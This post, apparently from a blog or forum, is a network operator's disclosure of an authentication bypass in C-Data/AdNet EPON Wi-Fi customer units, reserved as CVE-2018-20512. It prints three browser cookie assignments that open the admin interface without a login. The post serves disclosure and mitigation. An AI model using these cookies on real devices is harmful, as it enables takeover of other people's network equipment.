I recently signed up to receive emails from shadowserver regarding activity in my /19 and /20. Starting December 12, I started getting a lot of emails about IPs showing miria-like activity. After consolidating all of the reports and filtering for unique IPs I was able to take a closer look at the devices. I noticed that all of the affected IPs were using our AdNet (branded) CPE-WiFi EPON units, manufacturer is C-Data Technologies LTD.
I ran nessus against the devices to see if there were any current vulnerabilities, and none were reported back. I took a closer look at the devices myself and noticed that the login cookie was not unique to the device/login.
I was able to use Google Chrome developer console to send the following cookies on an un-logged in device:
document.cookie="cooLogin=1; path=/; expires=2018-12-28T12:03:02.000Z";
document.cookie="cooUser=admin; path=/; expires=2018-12-28T12:03:02.000Z";
document.cookie="timestamp=-1; path=/; expires=2018-12-28T12:03:02.000Z";
I then refreshed the login page and I was greeted with the Admin UI of the device.
I reached out to C-Data and AdNet but have yet to hear back from them since discovering the issue. I also requested a CVE for the issue, and it is currently reserved: CVE-2018-20512
I've never requested a CVE before, so not sure the process to move that out of "RESERVED".
Any who, just wanted to pass this bug along to /r/networking
My temp fix was just to ACL port 80 at our core going to the affected customers.
No comments:
Post a Comment